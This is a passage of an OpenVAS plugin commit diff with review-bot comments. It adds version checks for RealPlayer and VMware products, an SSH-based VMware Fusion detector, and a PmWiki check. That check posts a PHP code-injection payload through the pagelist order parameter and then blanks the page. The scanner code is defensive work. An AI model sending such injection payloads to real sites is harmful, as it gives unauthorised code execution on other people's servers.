+  script_dependencies("gb_pmwiki_detect.nasl");
+  script_require_ports("Services/www", 80);
+  exit(0);
+}
+
+
+include("http_func.inc");
+include("version_func.inc");
+include("http_keepalive.inc");
+
+## Get HTTP Port
+port = get_http_port(default:80);
+
+## Check Port State
+if(! get_port_state(port)) {
+  exit(0);
+}
+
+## Check Host Supports PHP
+if(! can_host_php(port:port)){
+  exit(0);
+}
+
+## Get Host Name
+host = get_host_name();
+if(! host){
+  exit(0);
+}
+
+## Get PmWiki Location
+if(!dir = get_dir_from_kb(port:port, app:"PmWiki")){
+  exit(0);
+}
+
+## Construct Attack Request
+url = dir + "/pmwiki.php";
+postData = "action=edit&post=save&n=Cmd.Shell&text=(:pagelist order=']);" +
+           "phpinfo();die;#:)";
+
+req = string("POST ", url, " HTTP/1.1\r\n",
+             "Host: ", host, "\r\n",
+             "Content-Type: application/x-www-form-urlencoded\r\n",
+             "Content-Length: ", strlen(postData), "\r\n",
+             "\r\n", postData);
+
+## Send crafted POST request and receive the response
+res = http_keepalive_send_recv(port:port, data:req);
+
+if(res =~ "HTTP/1.. 30")
+{
+  ## Confirm exploit worked by checking the response
+  path = url + "?n=Cmd.Shell";
+  if(http_vuln_check(port:port, url:path, pattern:">phpinfo\(\)<"))
+  {
+    ## Clean the pmwiki.php on success by sending empty POST
+    postData = "action=edit&post=save&n=Cmd.Shell&text=";
+    req = string("POST ", url, " HTTP/1.1\r\n",
+                 "Host: ", host, "\r\n",
+                 "Content-Type: application/x-www-form-urlencoded\r\n",
+                 "Content-Length: ", strlen(postData), "\r\n",
+                 "\r\n", postData);
+
+    res = http_keepalive_send_recv(port:port, data:req);
+
+    security_hole(port);
+  }
+}
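Review bot: The test page `Cmd.Shell` is only restored when the follow-up `http_vuln_check` matches. If the save is accepted (30x) but the pattern check fails, for instance on a timeout or a differently rendered page, the scanner leaves the modified page on the target. The cleanup POST should run whenever the save was accepted, with the verification result kept in a variable and reported afterwards, and its response should be checked so a failed restore is visible in the scan log. Because the script writes to the wiki, `ACT_DESTRUCTIVE_ATTACK` may describe it better than `ACT_ATTACK`. A pre-existing page of that name is emptied rather than restored, which deserves a comment in the script.

```nasl
if(res =~ "HTTP/1.. 30")
{
  ## Record the result first, then always restore the page
  path = url + "?n=Cmd.Shell";
  vulnerable = http_vuln_check(port:port, url:path, pattern:">phpinfo\(\)<");

  # … unchanged: empty-text POST for n=Cmd.Shell built into req …
  res = http_keepalive_send_recv(port:port, data:req);
  if(res !~ "HTTP/1.. 30"){
    log_message(port:port, data:"Could not restore the PmWiki test page.");
  }

  if(vulnerable){
    security_hole(port);
  }
}
```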


Property changes on: trunk/openvas-plugins/scripts/secpod_pmwiki_pagelist_order_param_php_code_inj_vuln.nasl
___________________________________________________________________
Name: svn:keywords
   + Revision Date Id

Added: trunk/openvas-plugins/scripts/secpod_realplayer_mult_vuln_nov11_macosx.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_realplayer_mult_vuln_nov11_macosx.nasl	2011-11-30 14:51:37 UTC (rev 12226)
+++ trunk/openvas-plugins/scripts/secpod_realplayer_mult_vuln_nov11_macosx.nasl	2011-11-30 15:19:06 UTC (rev 12227)
@@ -0,0 +1,87 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# RealNetworks RealPlayer Multiple Vulnerabilities Nov - 11 (Mac OS X)
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(902761);
+  script_version("$Revision$");
+  script_bugtraq_id(50741);
+  script_cve_id("CVE-2011-4253", "CVE-2011-4252", "CVE-2011-4250", "CVE-2011-4246",
+                "CVE-2011-4245", "CVE-2011-4255", "CVE-2011-4256");
+  script_tag(name:"cvss_base", value:"10.0");
+  script_tag(name:"risk_factor", value:"Critical");
+  script_tag(name:"last_modification", value:"$Date$");
+  script_tag(name:"creation_date", value:"2011-11-29 13:01:59 +0530 (Tue, 29 Nov 2011)");
+  script_name("RealNetworks RealPlayer Multiple Vulnerabilities Nov - 11 (Mac OS X)");
+  desc = "
+  Overview: This host is installed with RealPlayer which is prone to multiple
+  vulnerabilities.
+
+  Vulnerability Insight:
+  Multiple flaws are due to,
+  - Unspecified errors in RV20, RV10, RV30, ATRC and AAC codec, allows
+    attackers to execute arbitrary code via unspecified vectors.
+  - An unspecified error related to RealVideo rendering can be exploited
+    to corrupt memory.
+
+  Impact:
+  Successful exploitation allows remote attackers to execute arbitrary code or
+  cause a denial of service.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  RealPlayer version prior to 12.0.0.1703 on Mac OS X
+
+  Fix: Upgrade to RealPlayer version 12.0.0.1703 or later,
+  For Updates Refer, http://www.real.com/player
+
+  References:
+  http://secunia.com/advisories/46963/
+  http://service.real.com/realplayer/security/11182011_player/en/ ";
+
+  script_description(desc);
+  script_summary("Check for the version of RealPlayer");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 SecPod");
+  script_family("General");
+  script_dependencies("secpod_realplayer_detect_macosx.nasl");
+  script_require_keys("RealPlayer/MacOSX/Version");
+  exit(0);
+}
+
+
+include("version_func.inc");
+
+rpVer = get_kb_item("RealPlayer/MacOSX/Version");
+if(isnull(rpVer)){
+  exit(0);
+}
+
+## Check for Realplayer version
+if(version_is_less(version:rpVer, test_version:"12.0.0.1703")){
+  security_hole(0);
+}


Property changes on: trunk/openvas-plugins/scripts/secpod_realplayer_mult_vuln_nov11_macosx.nasl
___________________________________________________________________
Name: svn:keywords
   + Revision Date Id

Added: trunk/openvas-plugins/scripts/secpod_realplayer_mult_vuln_nov11_win.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_realplayer_mult_vuln_nov11_win.nasl	2011-11-30 14:51:37 UTC (rev 12226)
+++ trunk/openvas-plugins/scripts/secpod_realplayer_mult_vuln_nov11_win.nasl	2011-11-30 15:19:06 UTC (rev 12227)
@@ -0,0 +1,97 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# RealNetworks RealPlayer Multiple Vulnerabilities Nov - 11 (Win)
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(902762);
+  script_version("$Revision$");
+  script_bugtraq_id(50741);
+  script_cve_id("CVE-2011-4253", "CVE-2011-4252", "CVE-2011-4251", "CVE-2011-4250",
+                "CVE-2011-4249", "CVE-2011-4248", "CVE-2011-4247", "CVE-2011-4246",
+                "CVE-2011-4245", "CVE-2011-4244", "CVE-2011-4254", "CVE-2011-4255",
+                "CVE-2011-4262", "CVE-2011-4261", "CVE-2011-4260", "CVE-2011-4259",
+                "CVE-2011-4258", "CVE-2011-4257", "CVE-2011-4256");
+  script_tag(name:"cvss_base", value:"10.0");
+  script_tag(name:"risk_factor", value:"Critical");
+  script_tag(name:"last_modification", value:"$Date$");
+  script_tag(name:"creation_date", value:"2011-11-29 13:58:17 +0530 (Tue, 29 Nov 2011)");
+  script_name("RealNetworks RealPlayer Multiple Vulnerabilities Nov - 11 (Win)");
+  desc = "
+  Overview: This host is installed with RealPlayer which is prone to multiple
+  vulnerabilities.
+
+  Vulnerability Insight:
+  Multiple flaws are due to,
+  - Unspecified errors in RV20, RV10, RV30, ATRC and AAC codec, allows
+    attackers to execute arbitrary code via unspecified vectors.
+  - An unspecified error related to RealVideo rendering, related to MP4 video
+    dimensions can be exploited to corrupt memory.
+  - An unspecified error exists when parsing of QCELP streams, MP4 headers,
+    MP4 files and the channel within the Cook codec and MLTI chunk length
+    within IVR files.
+  - An unspecified error exists related to sample size when parsing RealAudio
+    files.
+  - An unspecified error exists when handling RTSP SETUP requests.
+
+  Impact:
+  Successful exploitation will let the attacker execute arbitrary codes within
+  the context of the application and can cause heap overflow or cause denial
+  of service.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  RealPlayer versions prior to 15.0.0
+
+  Fix: Upgrade to RealPlayer version 15.0.0 or later
+  For Updates Refer, http://www.real.com/player
+
+  References:
+  http://secunia.com/advisories/46954/
+  http://service.real.com/realplayer/security/11182011_player/en/ ";
+
+  script_description(desc);
+  script_summary("Check for the version of RealPlayer");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (C) 2011 SecPod");
+  script_family("General");
+  script_dependencies("gb_realplayer_detect_win.nasl");
+  script_require_keys("RealPlayer/Win/Ver");
+  exit(0);
+}
+
+
+include("version_func.inc");
+
+rpVer = get_kb_item("RealPlayer/Win/Ver");
+if(isnull(rpVer)){
+  exit(0);
+}
+
+# Real player versions < 15.0.0
+if(version_is_less(version:rpVer, test_version:"15.0.0.198")){
+  security_hole(0);
+}
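Review bot: The threshold in the final check, `15.0.0.198`, does not match what the plugin tells the user: the description says "RealPlayer versions prior to 15.0.0" and the comment above the check says `< 15.0.0`. As written, a host on a 15.0.0 build below .198 is reported although the text says it is not affected. Whichever value the vendor advisory supports, the check and the text should agree: either name the build in the description and comment (`# RealPlayer versions < 15.0.0.198`) or lower the test version to `15.0.0`.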


Property changes on: trunk/openvas-plugins/scripts/secpod_realplayer_mult_vuln_nov11_win.nasl
___________________________________________________________________
Name: svn:keywords
   + Revision Date Id

Added: trunk/openvas-plugins/scripts/secpod_vmware_fusion_detect_macosx.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_vmware_fusion_detect_macosx.nasl	2011-11-30 14:51:37 UTC (rev 12226)
+++ trunk/openvas-plugins/scripts/secpod_vmware_fusion_detect_macosx.nasl	2011-11-30 15:19:06 UTC (rev 12227)
@@ -0,0 +1,95 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# VMware Fusion Version Detection (Mac OS X)
+#
+# Authors:
+# Rachana Shetty <srachana at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+SCRIPT_OID  = "1.3.6.1.4.1.25623.1.0.902633";
+
+if(description)
+{
+  script_oid(SCRIPT_OID);
+  script_version("$Revision$");
+  script_tag(name:"last_modification", value:"$Date$");
+  script_tag(name:"creation_date", value:"2011-11-17 17:38:48 +0530 (Thu, 17 Nov 2011)");
+  script_tag(name:"cvss_base", value:"0.0");
+  script_tag(name:"risk_factor", value:"None");
+  script_tag(name:"detection", value:"executable version check");
+  script_name("VMware Fusion Version Detection (Mac OS X)");
+  script_description("Detection of installed version of VMware Fusion.
+
+The script logs in via ssh, searches for folder 'VMware Fusion.app' and
+queries the related 'info.plist' file for string 'CFBundleShortVersionString'
+via command line option 'defaults read'.");
+
+  script_summary("Detection of installed version of VMware Fusion");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 SecPod");
+  script_dependencies("gather-package-list.nasl");
+  script_family("Product detection");
+  exit(0);
+}
+
+
+include("ssh_func.inc");
+include("version_func.inc");
+include("cpe.inc");
+include("host_details.inc");
+
+## Checking OS
+sock = ssh_login_or_reuse_connection();
+if(!sock) {
+  if (defined_func("error_message"))
+    error_message(port:port, data:"Failed to open ssh port.");
+  exit(-1);
+}
+
+## Checking for Mac OS X
+if (!get_kb_item("ssh/login/osx_name")){
+  exit(0);
+}
+
+## Get the version of VMware Fusion Version
+vmfusionVer = chomp(ssh_cmd(socket:sock, cmd:"defaults read /Applications/" +
+                "VMware\\ Fusion.app/Contents/Info CFBundleShortVersionString"));
+
+## Close Socket
+close(sock);
+
+## Exit if version not found
+if(isnull(vmfusionVer) || "does not exist" >< vmfusionVer){
+  exit(0);
+}
+
+## Set the version in KB
+set_kb_item(name: "VMware/Fusion/MacOSX/Version", value:vmfusionVer);
+log_message(data:'Detected VMware version: ' + vmfusionVer +
+        '\nLocation: /Applications/VMware Fusion.app' +
+        '\n\nConcluded from version identification result:\n' + "VMware Fusion " + vmfusionVer);
+
+## build cpe and store it as host_detail
+cpe = build_cpe(value:vmfusionVer, exp:"^([0-9.]+)", base:"cpe:/a:vmware:fusion:");
+if(!isnull(cpe))
+  register_product(cpe:cpe, location:"/Applications/VMware Fusion.app", nvt:SCRIPT_OID);
+else
+  cpe = "Failed";
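Review bot: The output of the `defaults read` command is stored as the version without being checked to look like one; only NULL and the text "does not exist" are rejected. An empty result or any other error text would be written to `VMware/Fusion/MacOSX/Version` and logged as a detection, and the buffer-overflow plugin that requires this key would then compare against it. A guard such as `if(!vmfusionVer || vmfusionVer !~ "^[0-9]+\.[0-9.]+") exit(0);` before `set_kb_item` avoids that. Separately, `error_message(port:port, ...)` uses `port`, which is never assigned in this script, and the early exit for non-OS X hosts does not close `sock`.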


Property changes on: trunk/openvas-plugins/scripts/secpod_vmware_fusion_detect_macosx.nasl
___________________________________________________________________
Name: svn:keywords
   + Revision Date Id

Added: trunk/openvas-plugins/scripts/secpod_vmware_fusion_udf_filesys_bof_vuln_macosx.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_vmware_fusion_udf_filesys_bof_vuln_macosx.nasl	2011-11-30 14:51:37 UTC (rev 12226)
+++ trunk/openvas-plugins/scripts/secpod_vmware_fusion_udf_filesys_bof_vuln_macosx.nasl	2011-11-30 15:19:06 UTC (rev 12227)
@@ -0,0 +1,87 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# VMware Fusion UDF File Systems Buffer Overflow Vulnerability (Mac OS X)
+#
+# Authors:
+# Rachana Shetty <srachana at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(902634);
+  script_version("$Revision$");
+  script_cve_id("CVE-2011-3868");
+  script_bugtraq_id(49942);
+  script_tag(name:"cvss_base", value:"9.3");
+  script_tag(name:"risk_factor", value:"Critical");
+  script_tag(name:"last_modification", value:"$Date$");
+  script_tag(name:"creation_date", value:"2011-11-17 17:54:28 +0530 (Thu, 17 Nov 2011)");
+  script_name("VMware Fusion UDF File Systems Buffer Overflow Vulnerability (Mac OS X)");
+  desc = "
+  Overview: The host is installed with VMWare Fusion and are prone to
+  buffer overflow vulnerability.
+
+  Vulnerability Insight:
+  The flaw is due to an error when handling UDF filesystem images. This can be
+  exploited to cause a buffer overflow via a specially crafted ISO image file.
+
+  Impact:
+  Successful exploitation will let the attacker to execution of arbitrary code.
+
+  Impact Level: System/Application
+
+  Affected Software/OS:
+  Vmware Fusion 3.1.0 before 3.1.3
+
+  Fix : Upgrade to Vmware Fusion version 3.1.3 or later
+  For Upgrades refer, http://www.vmware.com/security/advisories/VMSA-2011-0011.html
+
+  References:
+  http://osvdb.org/76060
+  http://secunia.com/advisories/46241
+  http://www.securitytracker.com/id?1026139
+  http://www.vmware.com/security/advisories/VMSA-2011-0011.html ";
+
+  script_description(desc);
+  script_summary("Check for the version of VMware Fusion");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 SecPod");
+  script_family("Buffer overflow");
+  script_dependencies("secpod_vmware_fusion_detect_macosx.nasl");
+  script_require_keys("VMware/Fusion/MacOSX/Version");
+  exit(0);
+}
+
+
+include("version_func.inc");
+
+if(!get_kb_item("VMware/Fusion/MacOSX/Version")){
+  exit(0);
+}
+
+# Check for VMware Fusion
+vmfusionVer = get_kb_item("VMware/Fusion/MacOSX/Version");
+if(vmfusionVer != NULL )
+{
+  if(version_in_range(version:vmfusionVer, test_version:"3.1.0", test_version2:"3.1.2")){
+    security_hole(0);
+  }
+}
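Review bot: The upper bound of the range check is the last vulnerable release rather than the fixed one, so a detected string with an extra component (a constructed example: `3.1.2.1`) would probably compare above `3.1.2` and go unreported, depending on how version_in_range in version_func.inc orders components. Bounding by the fixed release is safer: `if(version_is_greater_equal(version:vmfusionVer, test_version:"3.1.0") && version_is_less(version:vmfusionVer, test_version:"3.1.3"))`. The same pattern appears in the Linux and Windows VMware Player/Workstation hunks (`3.1.4`, `7.1.4`). The KB key is also read twice here; one `get_kb_item` call with a single null check would be enough.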


Property changes on: trunk/openvas-plugins/scripts/secpod_vmware_fusion_udf_filesys_bof_vuln_macosx.nasl
___________________________________________________________________
Name: svn:keywords
   + Revision Date Id

Added: trunk/openvas-plugins/scripts/secpod_vmware_prdts_udf_filesys_bof_vuln_lin.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_vmware_prdts_udf_filesys_bof_vuln_lin.nasl	2011-11-30 14:51:37 UTC (rev 12226)
+++ trunk/openvas-plugins/scripts/secpod_vmware_prdts_udf_filesys_bof_vuln_lin.nasl	2011-11-30 15:19:06 UTC (rev 12227)
@@ -0,0 +1,102 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# VMware Products UDF File Systems Buffer Overflow Vulnerability (Linux)
+#
+# Authors:
+# Rachana Shetty <srachana at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(902490);
+  script_version("$Revision$");
+  script_cve_id("CVE-2011-3868");
+  script_bugtraq_id(49942);
+  script_tag(name:"cvss_base", value:"9.3");
+  script_tag(name:"risk_factor", value:"Critical");
+  script_tag(name:"last_modification", value:"$Date$");
+  script_tag(name:"creation_date", value:"2011-11-17 15:10:19 +0530 (Thu, 17 Nov 2011)");
+  script_name("VMware Products UDF File Systems Buffer Overflow Vulnerability (Linux)");
+  desc = "
+  Overview: The host is installed with VMWare products and are prone to
+  buffer overflow vulnerability.
+
+  Vulnerability Insight:
+  The flaw is due to an error when handling UDF filesystem images.This can be
+  exploited to cause a buffer overflow via a specially crafted ISO image file.
+
+  Impact:
+  Successful exploitation will let the attacker to execution of arbitrary code.
+
+  Impact Level: System/Application
+
+  Affected Software/OS:
+  Vmware Player version 3.0 before 3.1.5,
+  VMware Workstation version 7.0 before 7.1.5
+
+  Fix : Upgrade to Vmware Player version 3.1.5 or later
+  For updates refer, http://www.vmware.com/security/advisories/VMSA-2011-0011.html
+
+  Upgrade to Vmware Workstation version 7.1.5 or later
+  For updates refer, http://www.vmware.com/security/advisories/VMSA-2011-0011.html
+
+  References:
+  http://osvdb.org/76060
+  http://secunia.com/advisories/46241
+  http://www.securitytracker.com/id?1026139
+  http://www.vmware.com/security/advisories/VMSA-2011-0011.html ";
+
+  script_description(desc);
+  script_summary("Check for the version of VMware Products");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 SecPod");
+  script_family("Buffer overflow");
+  script_dependencies("gb_vmware_prdts_detect_lin.nasl");
+  script_require_keys("VMware/Linux/Installed");
+  exit(0);
+}
+
+
+include("version_func.inc");
+
+if(!get_kb_item("VMware/Linux/Installed")){
+  exit(0);
+}
+
+# Check for VMware Player
+vmplayerVer = get_kb_item("VMware/Player/Linux/Ver");
+if(vmplayerVer != NULL )
+{
+  if(version_in_range(version:vmplayerVer, test_version:"3.0", test_version2:"3.1.4"))
+  {
+    security_hole(0);
+    exit(0);
+  }
+}
+
+# Check for VMware Workstation
+vmworkstnVer = get_kb_item("VMware/Workstation/Linux/Ver");
+if(vmworkstnVer != NULL)
+{
+  if(version_in_range(version:vmworkstnVer, test_version:"7.0", test_version2:"7.1.4")){
+      security_hole(0);
+  }
+}


Property changes on: trunk/openvas-plugins/scripts/secpod_vmware_prdts_udf_filesys_bof_vuln_lin.nasl
___________________________________________________________________
Name: svn:keywords
   + Revision Date Id

Added: trunk/openvas-plugins/scripts/secpod_vmware_prdts_udf_filesys_bof_vuln_win.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_vmware_prdts_udf_filesys_bof_vuln_win.nasl	2011-11-30 14:51:37 UTC (rev 12226)
+++ trunk/openvas-plugins/scripts/secpod_vmware_prdts_udf_filesys_bof_vuln_win.nasl	2011-11-30 15:19:06 UTC (rev 12227)
@@ -0,0 +1,102 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# VMware Products UDF File Systems Buffer Overflow Vulnerability (Win)
+#
+# Authors:
+# Rachana Shetty <srachana at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(902631);
+  script_version("$Revision$");
+  script_cve_id("CVE-2011-3868");
+  script_bugtraq_id(49942);
+  script_tag(name:"cvss_base", value:"9.3");
+  script_tag(name:"risk_factor", value:"Critical");
+  script_tag(name:"last_modification", value:"$Date$");
+  script_tag(name:"creation_date", value:"2011-11-17 15:15:00 +0530 (Thu, 17 Nov 2011)");
+  script_name("VMware Products UDF File Systems Buffer Overflow Vulnerability (Win)");
+  desc = "
+  Overview: The host is installed with VMWare products and are prone to
+  buffer overflow vulnerability.
+
+  Vulnerability Insight:
+  The flaw is due to an error when handling UDF filesystem images. This can be
+  exploited to cause a buffer overflow via a specially crafted ISO image file.
+
+  Impact:
+  Successful exploitation will let the attacker to execution of arbitrary code.
+
+  Impact Level: System/Application
+
+  Affected Software/OS:
+  Vmware Player 3.0 before 3.1.5,
+  VMware Workstation 7.0 before 7.1.5
+
+  Fix : Upgrade to Vmware Player version 3.1.5 or later
+  For updates refer, http://www.vmware.com/security/advisories/VMSA-2011-0011.html
+
+  Upgrade to Vmware Workstation version 7.1.5 or later
+  For updates refer, http://www.vmware.com/security/advisories/VMSA-2011-0011.html
+
+  References:
+  http://osvdb.org/76060
+  http://secunia.com/advisories/46241
+  http://www.securitytracker.com/id?1026139
+  http://www.vmware.com/security/advisories/VMSA-2011-0011.html ";
+
+  script_description(desc);
+  script_summary("Check for the version of VMware Products");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 SecPod");
+  script_family("Buffer overflow");
+  script_dependencies("gb_vmware_prdts_detect_win.nasl");
+  script_require_keys("VMware/Win/Installed");
+  exit(0);
+}
+
+
+include("version_func.inc");
+
+if(!get_kb_item("VMware/Win/Installed")){
+  exit(0);
+}
+
+# Check for VMware Player
+vmplayerVer = get_kb_item("VMware/Player/Win/Ver");
+if(vmplayerVer != NULL )
+{
+  if(version_in_range(version:vmplayerVer, test_version:"3.0", test_version2:"3.1.4"))
+  {
+    security_hole(0);
+    exit(0);
+  }
+}
+
+# Check for VMware Workstation
+vmworkstnVer = get_kb_item("VMware/Workstation/Win/Ver");
+if(vmworkstnVer != NULL)
+{
+  if(version_in_range(version:vmworkstnVer, test_version:"7.0", test_version2:"7.1.4")){
+      security_hole(0);
+  }
+}


Property changes on: trunk/openvas-plugins/scripts/secpod_vmware_prdts_udf_filesys_bof_vuln_win.nasl
___________________________________________________________________
Name: svn:keywords
   + Revision Date Id


